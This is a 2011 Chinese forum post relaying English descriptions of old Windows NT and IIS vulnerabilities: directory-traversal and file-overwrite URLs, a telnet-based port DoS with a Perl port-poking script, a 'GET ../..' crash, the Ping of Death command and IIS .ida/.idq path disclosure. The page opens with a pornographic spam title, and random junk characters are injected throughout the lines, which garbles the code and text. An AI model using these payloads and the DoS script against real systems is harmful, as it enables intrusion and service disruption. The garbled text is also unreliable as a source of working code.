亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

<address id="xly8e"><var id="xly8e"><center id="xly8e"></center></var></address>
<kbd id="xly8e"><dl id="xly8e"></dl></kbd>
<bdo id="xly8e"><mark id="xly8e"><legend id="xly8e"></legend></mark></bdo>
  • <span id="xly8e"><delect id="xly8e"></delect></span>

     找回密碼
     注冊

    QQ登錄

    只需一步,快速開始

    NT的漏洞及描述(英文)

    [復(fù)制鏈接]
    1#
    發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
    受影響系統(tǒng):4.0,iis 1.0  W' r- n" M& K  g
    A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
    ! _1 G- c! O5 J
    / ^8 m9 M( h8 |( [  X# \, {" ^A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
    ; d! R& i$ n7 d6 `; Z1 p; L3 _$ W5 ~
    By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.8 Y6 D3 |* q' [! y. N8 G

    ; w8 [0 l- u: F, o--------------------------------------------------------------------
    - R# z1 H& V* X6 h/ g" j  T) [* q% Z2 G0 j) }0 `4 Y/ @
    受影響系統(tǒng):4.01 J% ^2 ]& S4 J; p% [
    A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
    ( T2 C% d0 e( V: j" J/ [! f
    ; f+ D5 v* M3 NIf the file 'target.bat' exists, the file will be truncated.. V9 P" p9 W% U# t& G' [

    1 z8 u; U3 G" q
    7 \1 H. ~4 n1 o$ j. SA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.( k0 D0 Z4 x% k- T; v

    : K# q# A) c  X6 X: \* D----------------------------------------------------------------------# N+ _9 n/ Z; O' ^  u6 r  |$ J
    / L4 l) x/ @4 {8 b: c, B
    受影響系統(tǒng):3.51,4.0
    5 U( z" d9 v  h+ q% Q5 J0 y9 Y5 K  nMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
    0 I& @2 x* e+ r, V+ o6 D- A! b8 }
    The following steps;
    - c+ t- f- F- ~8 L+ l& u
    ) i5 B# O8 a8 T: g5 `( ~Telnet to an NT 4.0 system on port 135 * D$ I: `5 b% d( }$ K* H/ Z
    Type about 10 characters followed by a <CR> - S5 }" y; I9 x% Q4 D
    Exit Telnet
    3 l3 N2 s9 |4 @: G0 a! T- _4 @results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
    ' i- K0 V" M2 C9 P- }, z7 n1 T, D7 |1 b! l9 D! n
    When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
    - E; l/ h5 a# O. t' `& `7 ^
    # k  P7 {' Y4 @The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
    ! ~* y$ ~6 t0 b: K# ~
    6 |8 y; y0 R& w, {# aIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
    ' x# w2 M: w$ h) ^) o& f; ^. A
    1 N1 N3 t! D9 z. R. SThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% k. X5 D: b6 c
    " Y% B8 H: ]- ~: W/ I
    /*begin poke code*/7 ]' v6 ~9 R$ P& m! E" b% w

    - M/ d, S" G' h, m( j  M7 `use Socket;# Y7 h0 s5 h! Z& K+ J. t3 D
    use FileHandle;
    1 `6 K  Q5 F* rrequire "chat2.pl";% d- a" @  Q/ X3 V; t4 P

    : O+ S% N5 ?# P$systemname = $ARGV[0] && shift;6 e! P# C- e8 t! O8 C
    - E5 ?  ~$ j# M. N1 O
    $verbose = 1; # tell me what you're hitting0 K. u5 t( I* u
    $knownports = 1; # don't hit known problem ports
    ; t3 g" h& k6 n* ^$ P1 Bfor ($port = $0; $port<65535; $port++) 4 p5 X, Q0 }8 E2 D2 `
    {
    ; u. v4 Z4 ~; A: x+ v, R' J( g, a: ]" `1 F  C1 B, V( {
    7 d0 i$ `4 e* o
    if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {% P. W) [' k  O& d4 k, M
    next;
    4 p6 J  a) t; h6 \  Y# G}1 n! L% v1 H  e
    $fh = chat::open_port($systemname, $port);
    - J2 A* p5 F' z% i, Qchat::print ($fh,"This is about ten characters or more");4 f! l  F6 t; ~! _" ~1 r- e
    if ($verbose) {- q  x! m' T) d
    print "Trying port: $port\n";
    9 V( W# z; N( _& [) Y2 C" q} 5 ]- I6 R% v5 m& f1 W$ j
    chat::close($fh);
    , N$ R  i  o- Q$ `/ B# s2 _) g$ i4 q$ ^" m# M( L0 W, m+ I# m" `" a
    }
    , O% V4 H0 E% m9 P2 r) p( S) n; q3 O& o9 D- `

    9 w! ]$ u  P% X2 s4 f/*end poke code*/
    ! }2 \2 J& |* G0 l0 x5 ?' ~& u# N' C5 m, v3 t, U/ v3 h+ q( @
    Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername5 b# R7 u  B' W; |

    ' @; P2 [( _+ B--------------------------------------------------------------------------------
    0 B) w/ Z4 _* \3 M- Q& z* ?. @" s, D: b
    受影響系統(tǒng):4.0# F% O0 b6 q  u# X  ~$ A" z
    Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.' J, s7 Q$ X$ C  D

    8 `" i7 R# A+ DThis attack causes Dr. Watson to display an alert window and to log an error: 6 f- a5 g+ P& D- @. e

    $ E9 F5 {- [, H& v  l"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 X' ~* H8 E# J

    - ]' z! H! m4 f4 j: }9 v--------------------------------------------------------------------------------6 m/ r, Y: j0 f$ J( e+ Z" T. `
    , U2 Y0 N2 @7 O1 e( r
    受影響系統(tǒng):3.51,4.0
    # W6 J& z: v5 T3 N5 L8 D' \Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:" D$ y+ A9 w2 ~+ ^( ~
    ( L$ a. E* n8 b' l: G2 _
    STOP: 0X0000001E/ |3 j& z- c( F7 y! j
    KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS2 \) u! y6 o3 S

    - K/ C, d+ [5 T' @( j" X-OR-
    4 q+ p( l" }$ @
    5 P5 z: B( s  M. _STOP: 0x0000000A
    ! e! j5 D: R: DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
    . A8 q4 H0 O1 X, A* b3 E+ ~/ u; f
    - k% ]8 W& M4 X+ U7 lNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
    3 B! [% `) o" r# C6 ~" ~7 b5 B# @3 @0 n- L. N
    --------------------------------------------------------------------------------
    5 D: M' J- y, E" {) a6 V
    3 s9 H1 o2 D$ H, z: J0 ~Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ) q. p! x( z7 d2 f
    ; v1 B0 H* m& y9 s: I2 J( G8 U
    --------------------------------------------------------
    ; i8 F! p2 @+ p% D7 l) E+ u2 [2 [. {, V# z1 \" c
    IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
    您需要登錄后才可以回帖 登錄 | 注冊

    本版積分規(guī)則

    QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

    GMT+8, 2025-7-2 22:09

    Powered by Discuz! X3.5

    © 2001-2025 Discuz! Team.

    快速回復(fù) 返回頂部 返回列表